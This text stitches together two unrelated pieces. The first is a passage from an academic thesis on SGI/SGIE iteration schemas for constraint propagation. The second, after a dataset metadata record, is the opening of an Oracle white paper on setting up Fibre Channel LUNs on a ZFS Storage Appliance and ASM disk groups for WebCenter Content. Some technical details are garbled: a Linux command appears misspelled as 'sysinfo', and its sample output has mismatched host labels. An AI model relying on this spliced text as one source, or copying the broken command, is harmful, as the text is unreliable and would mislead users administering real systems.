Suppose that we can devise a partial order \( \sqsubseteq \) on a quotient set \( O \) isomorphic to \( V/\equiv \), such that \( \langle O, \sqsubseteq, \bot^O \rangle \) turns out to be a partial ordering with bottom. Then we can try to transfer the analysis and results concerning SGI, over the partial ordering \( \langle O, \sqsubseteq, \bot^O \rangle \), to SGI over the equivalence structure \( \langle V, \equiv \rangle \).
Let \( F^V \) and \( F^O \) be, respectively, a finite set of functions over \( V \) and \( O \). Consider a bijective map \( f : F^O \rightarrow F^V \) that maps the identity of \( F^O \) to the identity function of \( F^V \). Let us denote
\[
f^V := f(f^O),
\]
for each \( f^O \in F^O \). Now, suppose that an SGI trace \( \langle (v_n, G_n^V) : n \in \mathbb{N} \rangle \) of \( F^V \) functions can be associated with an SGI trace \( \langle (o_n, G_n^O) : n \in \mathbb{N} \rangle \) of \( F^O \) functions via \( f \), and that such traces enjoy the following property:
1. \( v_0 \in o_0 \);
2. for every \( n \geq 0 \), if \( v_{n+1} = f^V(v_n) \) for \( f^V \in G_n^V \) then \( o_{n+1} = f^O(o_n) \) for \( f^O \in G_n^O \), and the following property holds:
there exists \( m \geq n + 1 \) such that \( v_m \in o_m \).
Then the two traces \( \langle (v_n, G_n^V) : n \in \mathbb{N} \rangle \) and \( \langle (o_n, G_n^O) : n \in \mathbb{N} \rangle \) are called \( \equiv \)-equivalent via \( f \).
The characterisation of \( \equiv \)-equivalence, via a function \( f \), is sufficient to obtain the following result.
**Lemma 3.4.13.** Consider an SGI trace \( o := \langle o_n : n \in \mathbb{N} \rangle \) and an \( \equiv \)-equivalent SGI trace \( v := \langle v_n : n \in \mathbb{N} \rangle \).
- The trace \( v \) stabilises at a value \( v \in V \) if the trace \( o \) does so at a value \( o \in O \);
- furthermore, the value \( o \in O \) (where \( O \) is isomorphic to \( V/\equiv \)) corresponds to the \( \equiv \)-class of \( v \).
PROOF. Suppose that \( \langle o_n : n \in \mathbb{N} \rangle \) stabilises at \( o_n \). Then \( G_n^O = \emptyset \), hence \( G_n^V \) is empty due to the definition of equivalent traces above. Then \( v_n \in o_n \) follows from the above definition. Therefore \( \langle (v_n, G_n^V) : n \in \mathbb{N} \rangle \) stabilises at \( v_n \in o_n \). \( \square \)
The following definition extends the notion of \( \equiv \)-equivalence between traces to an analogous between algorithm executions.
**Definition 3.4.14.** If there exists a map \( f \) such that every SGIE trace with \( F^V \) is \( \equiv \)-equivalent to an SGI trace with \( F^O \) via \( f \), then SGIE with \( F^V \) is called \( \equiv \)-equivalent to SGI with \( F^O \).
The following theorem is a consequence of Facts 3.3.6 and 3.4.12, and the above Lemma 3.4.13.
**Theorem 3.4.15.** Suppose that every execution of SGI terminates by computing the least common fixpoint \( o \) of the \( F_o \) functions. If SGIE with \( F^V \) functions over \( \langle V, \equiv \rangle \) is \( \equiv \)-equivalent to SGI, then every execution of SGIE terminates by computing \( \equiv \)-equivalent values; i.e. values \( v \) in the \( \equiv \)-class that corresponds to \( o \). \( \square \)
Theorem 3.4.15 above implies that we can study instances of the SGIE schema — that takes in input a set \( V \) with an equivalence relation — if we can provide, for them, equivalent instances of the SGI algorithm schema:
1. we devise a partial ordering with bottom on a set \( O \), isomorphic to the quotient set \( V/\equiv \);
2. then we check whether the given instance of SGIE on \( V \) is \( \equiv \)-equivalent to an instance of SGI on \( O \), with suitable functions on \( O \);
3. if this equivalence holds, then Theorem 3.4.15 implies that, if SGI terminates by always computing the same value, then SGIE terminates by always computing values which belong to the same equivalence class.
These transfer results, summarised as in the below corollary, are consequences of Theorem 3.4.15, and Corollary 3.3.12 for SGI.
**Corollary 3.4.16.** Consider an instance of SGI with \( F^O \) functions on a finite partial ordering \( O := (O, \sqsubseteq, \perp^O) \). Let SGIE be instantiated with \( F^V \) functions on an equivalence structure \( V/\equiv \) that is isomorphic to \( O \). Furthermore, suppose that this instance of SGIE is \( \equiv \)-equivalent to the instance of SGI with the \( F^O \) functions on the partial ordering \( O \). Thus we have the following results:
- if the \( F^O \) functions are inflationary, then every execution of SGIE with the \( F^V \) functions on \( V \) terminates;
3.5. Conclusions
- if the $F^O$ functions are also monotone, then every execution of SGIE with the $F^V$ functions and $V$ terminates, by computing values which are all in the $\equiv$-class of the least common fixpoint of the $F^O$ functions.
Variations of SGIE
All versions of SGIE can be modified similarly and so generate a corresponding version of SGIE. However, in Chapter 4, we only deal with the following variations of SGIE:
- the GI algorithm (see Subsection 3.4.1) with equivalence, namely GIE;
- the SGIIIS algorithm (see Algorithm 3.4.1) with equivalence, denoted by SGIISE.
All these algorithms share the same parameters, which are specified as follows:
- an equivalence structure, namely a set $V$ and an equivalence binary relation $\equiv$ on it;
- $\bot^V$, an element of $V$;
- a finite set $F^V$ of functions $f^V : V \rightarrow V$;
- a subset $F_\bot^V$ of $F^V$ that contains every $F^V$ function $f^V$ for which $f^V(\bot) \neq \bot$;
- the update operator that selects and returns a subset of $F$ functions.
The definitions and results given above for SGIE are easily extended to the cases of GIE and SGIISE. We leave the task to fill in the details to the reader.
3.5 Conclusions
3.5.1 Synopsis
This chapter presents a basic algorithm schema, SGIE, and some of its variations. The SGIE schema iteratively applies functions until a common fixpoint of theirs is found: the Common Fixpoint Axiom 3.3.1 provides a sufficient property for this, and characterises the basic strategy of SGIE. Then Axioms 3.3.1 and 3.3.2 state sufficient properties for SGIE to find the least common fixpoint of the functions and terminate, respectively. Notice that all those properties are encountered in most constraint propagation algorithms, see Chapter 4 below; there, the SGIE schema or its variations are used as “templates” to explain and differentiate those algorithms.
Variations of the basic schema are thus studied in Section 3.4: they are differentiated in terms of update and properties of functions; these differences account
for different strategies of the algorithms in Chapter 4. Besides, some of those algorithms use additional support structures, so to speak: i.e., they remove values from the given CSP domains or constraints by storing information in other structures. In those cases the SGIE, namely SGI on an set equipped with an equivalence relation, proves useful: first the algorithms are instantiated to SGIE; then the additional structures are "scraped away" through the adopted equivalence relation, so that SGI can be used to analyse those algorithms too. These instances of SGI iterate functions that only remove values from domains or constraints, and do it in a monotone and inflationary manner; thus we are able to transfer the results obtained for SGI instances to SGIE instances.
Some of the main variations of SGI and SGIE are summarised in the following table that contains in each cell, from left to right:
- a variation of SGI or SGIE;
- the related properties of functions;
- where the related update operator is characterised;
- where a variation is applied in Chapter 4, which deals with constraint propagation algorithms for CSPs — these are introduced in Chapter 2.
<table>
<thead>
<tr>
<th>SGI & SGIE Variations</th>
<th>Properties of Functions</th>
<th>The update Operator</th>
<th>Where in Chapter 4</th>
</tr>
</thead>
<tbody>
<tr>
<td>SGIIS</td>
<td>idempotency, stationarity</td>
<td>Idempotency Lemma 3.4.3, Stationarity Lemma 3.4.9</td>
<td>(H)AC–4, (H)AC–5, PC–4</td>
</tr>
<tr>
<td>SGISE</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>GI</td>
<td></td>
<td>Common Fixpoint Axiom 3.3.1</td>
<td>(H)AC–1, PC–1, RC_{(i,m)}</td>
</tr>
<tr>
<td>GIC</td>
<td>commutativity</td>
<td>Commutativity Lemma 3.4.6</td>
<td>AC–3</td>
</tr>
<tr>
<td>GIIS</td>
<td>idempotency, stationarity</td>
<td>Idempotency Lemma 3.4.3, Stationarity Lemma 3.4.9</td>
<td>KC</td>
</tr>
<tr>
<td>GIISE</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Chapter 5 concerns itself with non-standard CSPs that allow to obtain optimal partial solutions, according to certain criteria: the original algorithm schema for constraint propagation is extended via SGI. In Chapter 2 and Sections 5.4, 5.5 of Chapter 5, we also apply the results of the present chapter as displayed in the following table: this shows how properties of functions or update are correlated to properties of algorithms in both Chapters 2 and 5.
3.5. Conclusions
<table>
<thead>
<tr>
<th>Properties of update or Functions</th>
<th>Properties of Algorithms</th>
<th>Where in Chapter 4</th>
<th>Where in Chapter 5</th>
</tr>
</thead>
<tbody>
<tr>
<td>Common Fixpoint Axiom 3.3.1</td>
<td>partial correctness</td>
<td>Corollaries 4.2.4, 4.2.6, 4.2.12, 4.2.15, 4.2.16, 4.3.5, 4.3.7, 4.3.12, 4.4.7, 4.5.4</td>
<td>Corollary 5.4.4</td>
</tr>
<tr>
<td>Monotonicity Axiom 3.3.2</td>
<td>confluence</td>
<td>as above</td>
<td>Corollaries 5.4.5 and 5.4.6</td>
</tr>
<tr>
<td>Inflationarity Axiom 3.3.2</td>
<td>termination</td>
<td>as above</td>
<td>Corollaries 5.4.7, 5.4.14 and 5.4.15</td>
</tr>
</tbody>
</table>
3.5.2 Discussion
Using a single framework for presenting constraint propagation algorithms makes it easier to verify and compare these algorithms. Again from a theoretical viewpoint, this approach allows us to separate the properties that concur in the definition of a constraint propagation algorithm: e.g., inflationarity is related to termination and absence of backtracking; monotonicity to confluence; stationarity, commutativity and idempotence explain optimised strategies for various constraint propagation algorithms. Preserving equivalence is another important property of those algorithms: in such a general setting, we cannot tackle it, since we study functions on “generic” sets, i.e., not on CSPs. Nonetheless, in Chapter 4, it is always easy to prove, by means of the adopted functions, that constraint propagation algorithms maintain equivalence.
From an applicative viewpoint, this approach allows us to parallelise constraint propagation algorithms in a simple and uniform way and result in a general framework for distributed constraint propagation algorithms; see [Mon00]. This shows that constraint propagation can be viewed as the coordination of cooperative agents. Additionally, such a general framework facilitates the combination of these algorithms, a property often referred to as solver cooperation or combination. Finally, the generic iteration algorithm SGI and its specializations can be used as a template for deriving specific constraint propagation algorithms in which specific scheduling strategies are employed.
|
{"Source-Url": "https://pure.uva.nl/ws/files/3416530/21531_UBA002000738_08.pdf", "len_cl100k_base": 13793, "olmocr-version": "0.1.53", "pdf-total-pages": 23, "total-fallback-pages": 0, "total-input-tokens": 65043, "total-output-tokens": 15085, "length": "2e13", "weborganizer": {"__label__adult": 0.0004696846008300781, "__label__art_design": 0.0005631446838378906, "__label__crime_law": 0.0006875991821289062, "__label__education_jobs": 0.003513336181640625, "__label__entertainment": 0.0002224445343017578, "__label__fashion_beauty": 0.00029587745666503906, "__label__finance_business": 0.0007815361022949219, "__label__food_dining": 0.0005488395690917969, "__label__games": 0.002323150634765625, "__label__hardware": 0.0012998580932617188, "__label__health": 0.0012292861938476562, "__label__history": 0.0007505416870117188, "__label__home_hobbies": 0.00032520294189453125, "__label__industrial": 0.0009379386901855468, "__label__literature": 0.0010232925415039062, "__label__politics": 0.0005059242248535156, "__label__religion": 0.0007834434509277344, "__label__science_tech": 0.485107421875, "__label__social_life": 0.00021207332611083984, "__label__software": 0.0113677978515625, "__label__software_dev": 0.485107421875, "__label__sports_fitness": 0.0004596710205078125, "__label__transportation": 0.0010042190551757812, "__label__travel": 0.0003142356872558594}, "weborganizer_max": "__label__science_tech", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 47944, 0.02866]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 47944, 0.62223]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 47944, 0.81013]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 2022, false], [2022, 4645, null], [4645, 6842, null], [6842, 9294, null], [9294, 11505, null], [11505, 14046, null], [14046, 16686, null], [16686, 18833, null], [18833, 21362, null], [21362, 22627, null], [22627, 24908, null], [24908, 27172, null], [27172, 29465, null], [29465, 31752, null], [31752, 33688, null], [33688, 35867, null], [35867, 38521, null], [38521, 41213, null], [41213, 43268, null], [43268, 45749, null], [45749, 47944, null], [47944, 47944, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 2022, false], [2022, 4645, null], [4645, 6842, null], [6842, 9294, null], [9294, 11505, null], [11505, 14046, null], [14046, 16686, null], [16686, 18833, null], [18833, 21362, null], [21362, 22627, null], [22627, 24908, null], [24908, 27172, null], [27172, 29465, null], [29465, 31752, null], [31752, 33688, null], [33688, 35867, null], [35867, 38521, null], [38521, 41213, null], [41213, 43268, null], [43268, 45749, null], [45749, 47944, null], [47944, 47944, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 47944, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 47944, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 47944, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 47944, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 47944, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 47944, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 47944, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 47944, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 47944, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 47944, null]], "pdf_page_numbers": [[0, 0, 1], [0, 2022, 2], [2022, 4645, 3], [4645, 6842, 4], [6842, 9294, 5], [9294, 11505, 6], [11505, 14046, 7], [14046, 16686, 8], [16686, 18833, 9], [18833, 21362, 10], [21362, 22627, 11], [22627, 24908, 12], [24908, 27172, 13], [27172, 29465, 14], [29465, 31752, 15], [31752, 33688, 16], [33688, 35867, 17], [35867, 38521, 18], [38521, 41213, 19], [41213, 43268, 20], [43268, 45749, 21], [45749, 47944, 22], [47944, 47944, 23]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 47944, 0.03846]]}
|
olmocr_science_pdfs
|
2024-12-08
|
2024-12-08
|
959b9f8c76d35b1a69d324714ca19fd6911234f1
|
An Oracle Technical White Paper
January 2014
v1.1
How to Deploy Oracle WebCenter Content on the Oracle ZFS Storage Appliance
How to Deploy Oracle WebCenter Content on the Oracle ZFS Storage Appliance
Overview .......................................................................................................................... 3
Prerequisite Setup .......................................................................................................... 5
Overview of Required Tasks .......................................................................................... 5
Configuring the Storage Network Infrastructure ......................................................... 7
Configuring the Oracle ZFS Storage Appliance ......................................................... 7
Configuring the Oracle ZFS Storage Appliance FC Targets ..................................... 8
Configuring the Oracle ZFS Storage Appliance FC Target Group .............................. 9
Determining the FC Initiator HBA WWNs ................................................................. 11
Determining the FC Initiator HBA WWNs under Oracle Solaris 11 ............................ 12
Determining the FC Initiator HBA WWNs under Oracle Enterprise Linux ............... 13
Configuring the FC Initiators ....................................................................................... 13
Configuring the FC Initiator Group ............................................................................. 14
Configuring the Required Storage for the Database ..................................................... 17
Defining a Sun ZFS Storage Appliance Project ....................................................... 17
Creating the LUNs for the Database Host ............................................................... 18
Creating the Oracle WebLogic Repository on the Database Host ............................... 20
Creating the ASM Disk Groups .............................................................................. 20
Creating the Database on the ASM Disk Groups ..................................................... 22
Installing the Oracle Fusion Middleware Components ................................................. 31
Creating the Oracle Fusion Middleware Repository .............................................. 31
Installing Oracle WebLogic ......................................................................................... 38
Installing WebCenter Content ..................................................................................... 41
Configuring the Oracle WebLogic Domain........................................ 47
Starting the Administration Server / Oracle WebLogic ............... 57
Starting the Node Manager................................................................. 58
Performing Runtime Configuration of WebCenter Content......... 61
Conclusion ......................................................................................... 65
References ......................................................................................... 66
Overview
Oracle WebCenter Content is a highly integrated Enterprise Content Management (ECM) platform allowing the consolidation of unstructured content in a flexible and secure management system. Oracle WebCenter Content allows the management of content as a strategic asset and the integration of enterprise applications and business processes.
The basic architectural features of Oracle ZFS Storage Appliance are designed to provide high performance, flexibility and scalability. Besides its easy-to-use interface and detailed metrics using its DTrace Analytics tool, Oracle ZFS Storage Appliance features a unique Oracle integration with Hybrid Columnar Compression that delivers 3x to 5x better storage efficiency for Oracle databases with in-database archiving.
By using the features of Oracle Database, Oracle Grid Infrastructure and Oracle ZFS Storage Appliance, a rapid deployment of a secure ECM environment is made possible.
This document describes the minimum steps required to deploy Oracle WebCenter Content using the Oracle ZFS Storage Appliance as the infrastructure for holding the back-end database.
NOTE: References to Sun ZFS Storage Appliance, Sun ZFS Storage 7000, and ZFS Storage Appliance all refer to the same family of Oracle ZFS Storage Appliance products. Some cited documentation or screen code may still carry these legacy naming conventions.
Oracle WebCenter Content is built on and integrates with Oracle Fusion Middleware components. Oracle WebCenter Content provides all the tools needed to create the back-end schema required to support the middleware applications.
Oracle WebLogic is the Oracle Fusion Middleware component set that controls and monitors Oracle WebCenter Content component applications. Oracle WebLogic also provides access to the back-end database through Open Database Connectivity (ODBC) libraries.
Oracle WebLogic is built on the concept of Oracle WebLogic server domains which contain one administration server and one or more managed servers (such as Oracle WebCenter.)
The steps to deploy Oracle WebCenter Content with an Oracle ZFS Storage Appliance infrastructure involve creating these middleware building blocks, as seen in the basic architecture shown in Figure 1.
Figure 1. Logical architecture
The database and Oracle WebLogic hosts may be located on the server or, for performance or administration reasons, they may also be hosted on different hosts. In the example shown in this document, they are installed on the same host but their logical functions are still distinct.
Installing the correct versions of the individual components is very important. In order to ensure smooth deployment, the Oracle web site has the necessary links for the correct component version downloads at:
Prerequisite Setup
Note the following assumptions regarding existing setup upon which the WebCenter Content deployment steps depend:
- A known root password for the Oracle ZFS Storage Appliance exists.
- A known IP address or hostname of the Oracle ZFS Storage Appliance exists.
- A network used by the Oracle ZFS Storage Appliance that is already configured exists.
- Configured pools with sufficient free space available on the Oracle ZFS Storage Appliance exist.
- A known root password for the database and Oracle WebLogic server exists.
- Oracle Grid Infrastructure has been installed on the database server.
- Oracle Database has been installed on the database server.
Overview of Required Tasks
Deploying WebCenter Content requires configuration of four primary components of the architecture shown in figure 1: the Oracle ZFS Storage Appliance, the Oracle Database backend, and the Oracle Fusion Middleware components – Oracle WebLogic management software, and within that, Oracle WebCenter Content. The following tasks are required to install and/or configure the components:
- Configuring the storage network infrastructure
- Configuring the Oracle ZFS Storage Appliance
- Presenting the required storage resources to the database server
- Configuring the back-end Oracle Database – Creating the database for backend storage on the database server
- Configuring the Oracle WebLogic Repository
- Installing and configuring the Oracle Fusion Middleware components
- Installing WebCenter Content
- Configuring the Oracle WebLogic domain
- Creating and assigning the middleware application servers
- Starting the middleware application servers
- Performing the WebCenter Content configuration
Configuring the Storage Network Infrastructure
The choice of which block-level protocol and infrastructure to use depends on local policy and any existing connections between the Oracle ZFS Storage Appliance and the database host.
The Oracle ZFS Storage Appliance supports all major protocols, including CIFS (Common Internet File System), NFS (Network File System), FC (Fibre Channel), iSCSI (Internet Small Computer System Interface) and IB (Infiniband). The choice of storage network infrastructure is outside the scope of this document.
For the purposes of this document, the storage network infrastructure is assumed to be Fibre Channel and all the necessary zoning has been performed on the fabric switches.
Tutorials on creating iSCSI LUNs and Fibre Channel LUNs for use in Oracle Solaris, Oracle Linux or Microsoft Windows Server 2008 R2 environments are available at the Oracle Technology Network information web site, under Sun NAS Storage Documentation at:
Configuring the Oracle ZFS Storage Appliance
The following tasks, depending on the implementation category, are required to configure the Oracle ZFS Storage Appliance. These steps need only be carried out once and can be omitted if successfully completed beforehand:
- Configure the FC targets.
- Configure the FC target group.
If no LUNs are being or have been presented to the database host, the following tasks are necessary:
- Determine the FC initiator Host Bus Adapter (HBA) World Wide Names (WWN).
- Configure the FC initiators.
- Configure the FC initiator group.
Perform the following steps whenever a new storage allocation will be made:
1. Create the LUN with the required attributes.
2. Present the LUN to the FC initiator group through the FC target group.
Configuring the Oracle ZFS Storage Appliance FC Targets
The FC targets are configured on the Oracle ZFS Storage Appliance to identify the appliance to the fabrics to which it will be attached.
The FC targets are defined by the HBA WWNs installed in the Oracle ZFS Storage Appliance. These FC targets are used not only within the Oracle ZFS Storage Appliance but also in any FC switches to provide the correct zoning information to ensure that only the appropriate devices can communicate. The method of zoning depends on the switch manufacturer. Reference the documentation provided by the manufacturer for details on required operations.
To configure the FC target, first establish a management session with the Oracle ZFS Storage Appliance.
1. Enter an address in the address field of a web browser that includes the IP address or hostname of the Oracle ZFS Storage Appliance:
https://<ip-address or hostname>:215
The login dialog window shown in Figure 2 is displayed.

2. Enter a **Username** and **Password** and click **LOGIN**.
Once you have successfully logged in to the BUI, identify the FC Target WWNs by navigating through the Configuration > SAN > FC Channel > Ports tabs, as highlighted in figure 3.
In the example, port 1 has the WWN 21:00:00:e0:8b:92:a1:cf and port 2 has the WWN 21:01:00:e0:8b:b2:a1:cf.
The FC channel ports should be set to Target in the dropdown box to the right of the individual FC port box. If this is not the case, the FC port may be in use for another purpose; do not change this setting until it has been investigated (a possible additional purpose may be for NDMP backups).
Configuring the Oracle ZFS Storage Appliance FC Target Group
The FC target group’s purpose is to define upon which protocol and which interfaces LUNs will be presented and accessed. In order to create the FC target group, follow these steps:
1. While still in the Configuration > SAN > FC Channel > Ports display as shown in Figure 3, place the mouse pointer on one of the FC target ports. A 'move' icon appears to the left of the port box.
2. Click and hold the mouse button on the ‘move’ icon and drag the box to the Fibre Channel Target Groups area as shown in Figure 4.
3. Drop the entry in the orange box to create a new target group. The group is created automatically and is given a name like ‘targets-n’ where ‘n’ is an integer. An example is shown in Figure 5.

Move the cursor over the entry for the new target group. Two icons appear to the right of the target group box as shown in Figure 5.
4. Click the Edit icon (✏️) to display the dialog in Figure 6.

5. Enter the name for the FC target group in the Name box. The example in figure 6 shows the newly entered name FC-PortGroup. At this point, you can also add any
additional FC target ports by selecting the checkbox to the left of the appropriate WWN. The FC port is added to the target group. In the example, the port PCIe 1: Port 2 will be added to FC-PortGroup.
6. Click OK to save the changes.
7. Click Apply to commit all the changes made. Once the entries are successfully committed, the screen will resemble Figure 7.

**Determining the FC Initiator HBA WWNs**
In order to properly configure the Oracle ZFS Storage Appliance FC initiators and initiator groups, you must know the HBA WWNs that will represent the database host.
The FC initiator HBA WWNs are used to define which hosts have access to volumes presented by the Oracle ZFS Storage Appliance. These HBA WWNs are also used in the fabric zoning to define which host can access the Oracle ZFS Storage Appliance at all.
SAN Best Practices state that the security model deployed should be the 'Least Access' one – that is, the least number of devices able to communicate. This is done not only to maintain data security and data integrity but also to reduce the amount of unnecessary FC traffic. In terms of data integrity, unless a clusterable (or shared) filesystem or volume manager is being used (such as Oracle ASM), if more than one host writes to a given volume concurrently, inconsistencies may occur in the in-core filesystem caches in the hosts. Those inconsistencies may ultimately lead to corruption of the on-disk image or a server crash.
The method for gathering the WWNs depends on the operating system of the database host. The following shows methods for Oracle Solaris and Oracle Linux.
Determining the FC Initiator HBA WWNs under Oracle Solaris 11
Logging on under a terminal session to the Oracle Solaris 11 host, become root and issue the following command:
```
sol11host # fcinfo hba-port
HBA Port WWN: 230000144fb8130c
OS Device Name: /dev/cfg/c1
Manufacturer: QLogic Corp.
Model: 2200
Firmware Version: 02.01.145
FCode/BIOS Version: ISP2200 FC-AL Host Adapter Driver: 1.15
Serial Number: not available
Driver Name: qlc
Driver Version: 20090929-2.32
Type: L-port
State: online
Supported Speeds: 1Gb
Current Speed: 1Gb
Node WWN: 220000144fb8130c
HBA Port WWN: 210000e08a91bf8e
OS Device Name: /dev/cfg/c12
Manufacturer: QLogic Corp.
Model: 375-3294-01
Firmware Version: 05.01.02
FCode/BIOS Version: BIOS: 1.04; fcode: 1.11; EFI: 1.00;
Serial Number: 0402R00-0633171958
Driver Name: qlc
Driver Version: 20090929-2.32
Type: N-port
State: online
Supported Speeds: 1Gb 2Gb 4Gb
Current Speed: 4Gb
Node WWN: 200000e08a91bf8e
HBA Port WWN: 210100e08a91bf8e
OS Device Name: /dev/cfg/c13
Manufacturer: QLogic Corp.
Model: 375-3294-01
Firmware Version: 05.01.02
FCode/BIOS Version: BIOS: 1.04; fcode: 1.11; EFI: 1.00;
Serial Number: 0402R00-0633171958
Driver Name: qlc
Driver Version: 20090929-2.32
Type: N-port
State: online
Supported Speeds: 1Gb 2Gb 4Gb
Current Speed: 4Gb
Node WWN: 200100e08a91bf8e
```
As can be seen from the previous code, there are three FC ports available. The first is the embedded FC controller. The remaining two FC ports are the ones of interest – port
**Determining the FC Initiator HBA WWNs under Oracle Linux**
Logging on under a terminal session to the Oracle Linux host, become root and issue the following command:
```
[root@x4450-1 -]# sysinfo -c fc_host -A port_name
Class = "fc_host"
port_name = "0x2101001b322b5eb6"
Device = "host10"
Class Device = "host9"
port_name = "0x2100001b320b5eb6"
Device = "host9"
```
Here, the WWNs of interest are 0x2101001b322b5eb6 and 0x2100001b320b5eb6. These WWNs will be used to define the zoning on the FC switches and the FC initiators in the Oracle ZFS Storage Appliance.
**Configuring the FC Initiators**
The FC initiator serves to define the “host” to the Oracle ZFS Storage Appliance. In a traditional dual-fabric SAN, the host will be defined by at least two FC initiators. The FC initiator definition contains the host WWNs.
Using the example, identify the database host to the Oracle ZFS Storage Appliance by way of the FC initiator HBA WWNs discovered in the previous section.
1. Click Configuration>SAN>Fibre Channel to display the Storage Area Network (SAN) screen shown in Figure 8.
2. Select **Initiators** on the left panel as shown in Figure 8.
3. Click the icon to the left of **Initiators** to display the New Fibre Channel Initiator dialog shown in Figure 9.
4. If the zoning has been configured on the FC switches, the WWNs of the Oracle Solaris host should be displayed (assuming they have not been assigned to an alias already).
5. Click on one of the WWNs (if displayed at the bottom of the dialog box) to prepopulate the World Wide Name or type the appropriate WWN in to the World Wide Name box.
6. Enter a more meaningful symbolic name as the **Alias**.
7. Click **OK**.
8. Repeat steps 3 – 7 for the other WWNs that refer to the database host.
### Configuring the FC Initiator Group
Related FC initiators are combined into logical groups to allow single commands to be executed on multiple FC initiators, such as assigning LUN access to all FC initiators in a group. For this example, the FC initiator group will contain two initiators. In a cluster,
where multiple servers are treated as a single logical entity, the initiator group may contain
many more initiators.
To create an FC initiator group, complete these steps:
1. Select Configuration > SAN to display the Storage Area Network (SAN) screen.
2. Select the Fibre Channel tab at the right and then click Initiators on the left panel.
3. Place the cursor over the entry for one of the FC initiators created in the previous
section. The Move icon appears to the left of the entry as shown in Figure 10.
4. Click the icon and drag it to the Initiator Groups panel on the right. A new entry
appears at the bottom of the Initiator Groups panel as shown in Figure 11 (highlighted in
yellow).
5. Move the cursor over the new entry box and release the mouse button. A new FC
initiator group is created with a name initiators-n, where n is an integer as shown
in Figure 12.
6. Move the cursor over the entry for the new initiator group. Several icons appear to the
right of the target group box as shown in Figure 12.
Figure 10. Displaying the Move icon for the new FC initiator
Figure 11. Creating the FC initiator group
Figure 12. Selecting the FC initiator group
7. Click the Edit icon (edit) to display the dialog in Figure 12.
8. In the **Name** field, replace the default name with the name to be used for the FC initiator group and click **OK**. For this example, the name `ucm-dbserver` is used.
9. Additionally, the other FC initiator(s) can be added to the group at this time by clicking in the check box to the left of the WWN as seen in Figure 13.
Figure 13. Renaming and completing the FC initiator group
10. Click **APPLY** on the SAN configuration screen to confirm all the modifications as shown in Figure 14.
Figure 14. FC initiator configuration complete
Configuring the Required Storage for the Database
Still logged in to the Oracle ZFS Storage Appliance BUI, you now create the LUNs that will be presented to the database host. The first step for this operation is to create a project. Projects are used to group related filesystem and/or block-access LUNs for administrative purposes such as space management and common settings. Once the project is created, the storage required for the database host use will be allocated.
Defining an Oracle ZFS Storage Appliance Project
To create a project, complete the following steps:
1. Select Shares > Projects to display the Projects screen as shown in Figure 15.

2. To create a new project, enter a Name for the project and click APPLY. A new project appears in the Projects list in the left panel.
3. Select the new project to view the components that comprise the project, as shown in Figure 17.

Creating the LUNs for the Database Host
LUNs will now be created from the existing pool of storage resources. These LUNs will hold not only the data files for the WebCenter Content Manager backend database but also a flash recovery area (FRA) as required by Oracle Database configuration best practices.
To obtain optimal performance for the database access, the LUNs should be created with a block size of 64K and provisioned from a RAID-1 pool, as the database serving WebCenter Content Manager can be viewed as a general purpose database.
One difference from the recommendations provided in the listed document is that there will be no segregation of redo and archive logs; Oracle Automatic Storage Management (ASM) will provide the volume and placement management of the database components.
To create the LUNs, follow these steps:
1. Select the Shares > Projects tabs and click the ‘UCM’ project name as shown in Figure 18.
2. Click on the LUNs title.
3. Click the icon to display the Create LUN dialog window shown in Figure 19.
4. Enter the values appropriate for the data LUN. In the example, the Name is set to data01, the Volume size to 64GB, and the check box next to ‘Thin-provisioned’ is not checked. The Target Group should be set to FC-PortGroup and the Initiator Group to ucm-dbserver.
The Volume block size should be set to 64K as described for the example.
Click Apply to create the LUN and to make it available to the database host. The BUI panel should look similar to Figure 20.
5. Repeat steps 2 – 4 for the FRA LUN. In this example, the Name is fra01, and the Volume size is 128GB. All the other details should be the same.
Once completed, the LUNs panel should look like Figure 21.
Creating the Oracle WebLogic Repository on the Database Host
Once the necessary system administration tasks have been completed to access the allocated LUNs on the database host (enabling access for the oracle user, for example), the next step is to configure the LUNs as ASM disk groups and then create the database on the ASM disk groups.
Creating the ASM Disk Groups
1. Log on to the database host as the user oracle in a GUI session capable of running the GUI-based ASM Configuration wizard ‘asmca’.
2. Set the Oracle SID by running `. oraenv` as seen in the following example. Typically you will use ‘+ASM’ to access the ASM utilities.
```bash
{oracle!x4450 }$ . oraenv
ORACLE_SID = [oracle] ? +ASM
```
3. Run ‘asmca’. The ASM configuration wizard will be displayed as shown in Figure 22.

Figure 22. ASM configuration wizard
4. Click Create. The ‘Create Disk Group’ wizard will be shown as in Figure 23.
5. Enter the Disk Group Name, which in the example is ‘UCMDATA’. Ensure that the Redundancy check box is set at ‘External (None)’, as the data protection will be carried out by the Oracle ZFS Storage Appliance RAID-1 pool. Since a 64GB LUN was allocated for data, choose that volume (shown in the example as ‘/dev/dm-5’) by selecting the check box to the left of that volume, as shown in Figure 23.
6. Click OK. A “DiskGroup: Creation” progress bar will be shown, followed quickly by a successful creation notification.
7. Click OK.
8. Repeat steps 4 - 7 for the disk group UCMFRA which will contain the Flash Recovery Area for the UCM database using the 128GB volume (/dev/dm-6 in the example).
Once these steps are completed, the initial ASM Configuration Assistant screen will once again be displayed, with the disk groups UCMDATA and UCMFRA listed.
